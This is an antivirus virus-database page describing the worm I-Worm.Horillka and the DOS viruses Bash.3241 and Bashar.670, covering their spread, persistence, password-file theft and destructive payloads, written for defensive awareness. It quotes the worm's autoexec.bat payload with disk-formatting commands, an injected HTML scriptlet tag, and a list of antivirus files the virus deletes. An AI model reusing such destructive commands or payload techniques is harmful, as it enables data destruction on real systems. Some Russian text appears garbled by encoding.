Virus Database

I-Worm.Horillka

Description I-Worm.Horillka

This malicious worm spreads via the Internet in the form of a file attached to infected messages. It is an encoded VBS script of 25562 bytes.
When downloaded Horilka decrypts itself.
It copies itself to the Windows system directory under the name WinSys32dll.vbs, and registers this file in the system registry autorun key.
HKLMSoftwareMicrosoftWindowsCurrentVersionRunWinSys32dll.
The virus mass mails all addresses found in the Microsoft Outlook address book.
Characteristics of infected messages:
Message header:
÷ÎÉÍÁÎÉÅ!
Message body:
÷ÙÐÕÝÅÎÏ ÎÏ×ÏÅ vbs ÏÂÎÏ×ÌÅÎÉÅ ÄÌÑ ÐÏÉÓËÁ ×ÉÒÕÓÏ× × ÐÁÍÑÔÉ ïó Windows!
ïÎÏ ÐÏÍÏÇÁÅÔ ÂÏÒÏÔØÓÑ Ó ×ÉÒÕÓÁÍÉ, ÒÁÓÓÙÌÁÀÝÉÍÉÓÑ ÐÏ ÐÏÞÔÅ.
áÎÔÉ×ÉÒÕÓÎÙÊ ÍÏÄÕÌØ ÎÁÐÉÓÁÎ ÎÁ ÓËÒÉÐÔ-ÑÚÙËÅ, ÞÔÏ ÐÏÍÏÇÁÅÔ ÐÅÒÅÈ×ÁÔÙ×ÁÔØ
vb É js ×ÉÒÕÓÙ, ÐÒÅÖÄÅ ÞÅÍ ÏÎÉ ÎÁÞÎÕÔ ÄÅÓÔÒÕËÔÉ×ÎÕÀ ÄÅÑÔÅÌØÎÏÓÔØ.
äÏÓÔÁÔÏÞÎÏ ÏÔËÒÙÔØ ÆÁÊÌ É ÐÒÏÇÒÁÍÍÁ ÐÏ ÕÓÔÒÁÎÅÎÉÀ ×ÉÒÕÓÏ× ÐÒÏ×ÅÄÅÔ ÐÏÉÓË
×ÒÅÄÏÎÏÓÎÙÈ ÐÒÏÇÒÁÍÍ × ÐÁÍÑÔÉ ËÏÍÐØÀÔÅÒÁ.
Attachment:
a VBS script,
WinSys32.dll.vbs
Once messages have been sent, the virus sends its author a message which includes all .pwl (password) files found in the Windows directory.
Messages are sent once, when each user's configuration is loaded.
The virus copies itself to all disks and all directories under the name of Folderdll.vbs and marks these files as hidden.
It searches the Windows folder for files with the following extensions:
.vbs
.jpg
.jpeg
.gif
.bmp
.htm
.html
.avc
.txt
.doc
.mp3
.wav
.dbf
Horilka overwrites .vbs files with its own code.
It replaces .jpg, .jpeg, .gif and .bmp files with a GIF format graphic contained in the body of the virus.
It adds the following code to .htm and.html files:
<object id='test' data='#' width='100%' height='100%' type='text/x-scriptlet' VIEWASTEXT </object>
.avc files are overwritten with the phrase:
Vyatka was here
.txt and .doc files are overwritten with the following text:
õ×ÁÖÁÅÍÙÅ ÇÏÓÐÏÄÁ! ÷ÁÓ ÈÁËÎÕÌ ×ÉÒÕÓ ÉÚ ÷ÑÔËÉ - ÚÁÄÎÉÃÙ òÏÓÓÉÉ.
Dear friends! You was hacked by virus from Vyatka (situated in deep ass of Russia)
..:: Xpi1oT ::..
.mp3 and .wav files are replaced by sound files contained in the body of the worm
If the worm finds any files with a .dbf extension, it deletes them
The virus is coded to display the announcement:
COOOOOOOOL
on 11th December every year, and to overwrite the autoexec.bat file with the following text:
@Windows upgrading your systemall
@Please wait
format c: /autotest /q /u
@Please wait...
format d: /autotest /q /u
@Your system was hacked by virus from Vyatka (situated in deep ass of Russia)
Once this takes place, the system will reboot, resulting in formating of the C: hard disk.

Check other viruses! Be aware! Use Antiviral Software

Bash.3241

Description Bash.3241

These are dangerous memory resident polymorphic parasitic viruses. They hook INT 21h and write themselves to the end of COM and EXE files that are executed or opened. The viruses also affect ARJ archives and insert an infected dropper file into them. The viruses use many anti-debugging tricks, which are buggy, and often halt the system because of that.
The viruses perform several actions directed to disable anti-viruses. First of all, while installing memory resident, they look for TBAV anti-virus driver in the memory, and disable it. They also looks for anti-virus data files, and delete them:
ANTI-VIR.DAT CRC.SVS MSAV.CHK BOOT.MS
ANTIVIR.DAT CRC_.SVS SMARTCHK.CPS BOOT.NTZ
ANYCHECK.VAL FILES.VVL TBUTIL.DAT BOOT.TAV
AVP.CRC FINGERP.VVF ZZ##.IM IV.INI
CHKLIST.CPS IM.PRM _ADINF.INI PART.NTZ
CHKLIST.MS IVB.INI AV.CRC VIRSORT.DAT
CHKLIST.TAV IVB.NTZ BOOT.CPS TBUTIL.DAT

The viruses also patch the AVP 2.x package, if it is installed. They creates the BIZATCH.AVB database in the AVP directory, and register it in the AVP.SET file. See "Anti-AVP" for more details.
From September 17th till October the viruses attampt to erase disk sectors and displays a picture, but fails because of a bug. The picture looks like follows:
all. NO! ... ... MNO! ...
..... MNO!! ...................... MNNOO! ...
..... MMNO! ......................... MNNOO!! .
.... MNOONNOO! MMMMMMMMMMPPPOII! MNNO!!!! .
... !O! NNO! MMMMMMMMMMMMMPPPOOOII!! NO! ....
...... ! MMMMMMMMMMMMMPPPPOOOOIII! ! ...
........ MMMMMMMMMMMMPPPPPOOOOOOII!! .....
........ MMMMMOOOOOOPPPPPPPPOOOOMII! ...
....... MMMMM.. OPPMMP .,OMI! ....
...... MMMM:: o.,OPMP,.o ::I!! ...
.... NNM:::.,,OOPM!P,.::::!! ....
.. MMNNNNNOOOOPMO!!IIPPO!!O! ..... ,
... MMMMMNNNNOO:!!:!!IPPPPOO! .... ***** ================-
.. MMMMMNNOOMMNNIIIPPPOO!! ...... AuRoDrEpH.....
...... MMMONNMMNNNIIIOO!.......... The Drow
....... MN MOMMMNNNIIIIIO! OO .......... Was Back !!!
......... MNO! IiiiiiiiiiiiI OOOO ...........
...... NNN.MNO! . O!!!!!!!!!O . OONO NO! ........
.... MNNNNNO! ...OOOOOOOOOOO . MMNNON!........
...... MNNNNO! .. PPPPPPPPP .. MMNON!........
...... OO! ................. ON! .......

The viruses also deletes disk files. In the root directories of all available logical drives they delete the "?????x??.*" files, where "x" is drive's letter. They also look for the SYSTEMIOSUBSYSHSFLOP.PDR file in the Windows directory, and delete it.
The viruses contain the text strings:
CARO: Please label this creation Hare.Little_Brother :-) or if you
want BSHME.Buggy.7xxx - This version is for educational purpose only!
Greetx to all virus writers! Still buggy but it works...
-=[ 1996 ]=-
-=[ U$A ]=-
-=[ BSHME ]=-

Bashar.670

Description Bashar.670

These are dangerous memory resident encrypted parasitic viruses, to decrypt themselves they use i387 instructions in decryption loops. They hook INT 21h and write themselves to the end of COM files that are executed. Because of a bug they may corrupt files while infecting them. The viruses contain the text string:
"[Bashar_Teg] by C.W. - 1997 (JAofM)"

Home